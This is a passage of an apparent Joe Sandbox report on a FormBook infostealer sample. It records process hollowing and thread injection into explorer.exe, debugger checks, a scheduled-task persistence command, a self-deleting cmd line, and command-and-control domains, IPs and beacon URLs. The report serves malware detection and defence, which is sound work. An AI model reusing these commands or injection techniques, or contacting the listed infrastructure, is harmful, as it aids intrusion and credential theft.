          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05098A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0508E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0513FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05114257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05089240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05089240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05089240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05089240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0513B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0513B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05158A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0511FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_051046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0509AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_05158ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050C8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_0513FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 20_2_050B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exeDomain query: www.tjandamber.com
          Source: C:\Windows\explorer.exeDomain query: www.fraktal.media
          Source: C:\Windows\explorer.exeDomain query: www.expertexceleratorchallenge.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.25.92.0 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeDomain query: www.d0berman245.xyz
          Source: C:\Windows\explorer.exeDomain query: www.cherrybunk.life
          Source: C:\Windows\explorer.exeDomain query: www.hellocharmaine.com
          Source: C:\Windows\explorer.exeDomain query: www.syzhtr.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.72.144.19 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: E60000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeMemory written: C:\Users\user\Desktop\tgamf4XuLa.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3388
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
          Source: explorer.exe, 00000007.00000000.277193116.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeQueries volume information: C:\Users\user\Desktop\tgamf4XuLa.exe VolumeInformation
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483617 Sample: tgamf4XuLa Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 41 www.realstylecelebz.com 2->41 43 www.dressmids.com 2->43 45 2 other IPs or domains 2->45 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 8 other signatures 2->59 11 tgamf4XuLa.exe 7 2->11         started        signatures3 process4 file5 33 C:\Users\user\AppData\Roaming\HpnpObXJP.exe, PE32 11->33 dropped 35 C:\Users\...\HpnpObXJP.exe:Zone.Identifier, ASCII 11->35 dropped 37 C:\Users\user\AppData\Local\...\tmpEC5E.tmp, XML 11->37 dropped 39 C:\Users\user\AppData\...\tgamf4XuLa.exe.log, ASCII 11->39 dropped 73 Uses schtasks.exe or at.exe to add and modify task schedules 11->73 75 Tries to detect virtualization through RDTSC time measurements 11->75 77 Injects a PE file into a foreign processes 11->77 15 tgamf4XuLa.exe 11->15         started        18 schtasks.exe 1 11->18         started        signatures6 process7 signatures8 79 Modifies the context of a thread in another process (thread injection) 15->79 81 Maps a DLL or memory area into another process 15->81 83 Sample uses process hollowing technique 15->83 85 Queues an APC in another process (thread injection) 15->85 20 explorer.exe 15->20 injected 24 conhost.exe 18->24         started        process9 dnsIp10 47 www.syzhtr.com 103.72.144.19, 49789, 80 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK China 20->47 49 www.discomountainkombucha.com 91.195.240.94, 49788, 49793, 80 SEDO-ASDE Germany 20->49 51 12 other IPs or domains 20->51 61 System process connects to network (likely due to code injection or exploit) 20->61 63 Performs DNS queries to domains with low reputation 20->63 26 control.exe 20->26         started        signatures11 process12 signatures13 65 Self deletion via cmd delete 26->65 67 Modifies the context of a thread in another process (thread injection) 26->67 69 Maps a DLL or memory area into another process 26->69 71 Tries to detect virtualization through RDTSC time measurements 26->71 29 cmd.exe 1 26->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          tgamf4XuLa.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\HpnpObXJP.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.tgamf4XuLa.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY0%Avira URL Cloudsafe
          http://www.cherrybunk.life/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz0%Avira URL Cloudsafe
          http://www.syzhtr.com/vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo0%Avira URL Cloudsafe
          http://www.d0berman245.xyz/vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo0%Avira URL Cloudsafe
          http://www.fraktal.media/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB0%Avira URL Cloudsafe
          https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png0%Avira URL Cloudsafe
          http://www.realstylecelebz.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se00%Avira URL Cloudsafe
          http://www.dressmids.com/vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo0%Avira URL Cloudsafe
          http://www.tjandamber.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf50%Avira URL Cloudsafe
          www.dressmids.com/vuja/0%Avira URL Cloudsafe
          http://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          fraktal.media
          34.98.99.30
          truefalse
            unknown
            www.cherrybunk.life
            52.25.92.0
            truetrue
              unknown
              www.hellocharmaine.com
              91.195.240.94
              truetrue
                unknown
                www.syzhtr.com
                103.72.144.19
                truetrue
                  unknown
                  expertexceleratorchallenge.com
                  34.98.99.30
                  truefalse
                    unknown
                    www.d0berman245.xyz
                    99.83.154.118
                    truetrue
                      unknown
                      www.realstylecelebz.com
                      99.83.154.118
                      truetrue
                        unknown
                        dressmids.com
                        34.98.99.30
                        truefalse
                          unknown
                          www.discomountainkombucha.com
                          91.195.240.94
                          truetrue
                            unknown
                            tjandamber.com
                            34.102.136.180
                            truefalse
                              unknown
                              www.tjandamber.com
                              unknown
                              unknowntrue
                                unknown
                                www.fraktal.media
                                unknown
                                unknowntrue
                                  unknown
                                  www.expertexceleratorchallenge.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.dressmids.com
                                    unknown
                                    unknowntrue
                                      unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORYtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.cherrybunk.life/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNztrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.syzhtr.com/vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lotrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.d0berman245.xyz/vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lotrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fraktal.media/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bBfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.realstylecelebz.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.dressmids.com/vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lofalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.tjandamber.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5false
                                      • Avira URL Cloud: safe
                                      unknown
                                      www.dressmids.com/vuja/true
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqdtrue
                                      • Avira URL Cloud: safe
                                      unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.value-domain.com/control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpfalse
                                        high
                                        https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.pngcontrol.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.value-domain.com/modall.phpcontrol.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpfalse
                                            high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            91.195.240.94
                                            www.hellocharmaine.comGermany
                                            47846SEDO-ASDEtrue
                                            52.25.92.0
                                            www.cherrybunk.lifeUnited States
                                            16509AMAZON-02UStrue
                                            34.102.136.180
                                            tjandamber.comUnited States
                                            15169GOOGLEUSfalse
                                            99.83.154.118
                                            www.d0berman245.xyzUnited States
                                            16509AMAZON-02UStrue
                                            34.98.99.30
                                            fraktal.mediaUnited States
                                            15169GOOGLEUSfalse
                                            103.72.144.19
                                            www.syzhtr.comChina
                                            135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKtrue

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:483617
                                            Start date:15.09.2021
                                            Start time:10:07:32
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 12m 2s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:tgamf4XuLa (renamed file extension from none to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:29
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@10/4@10/7
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 42.9% (good quality ratio 38%)
                                            • Quality average: 72.5%
                                            • Quality standard deviation: 32.7%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • TCP Packets have been reduced to 100
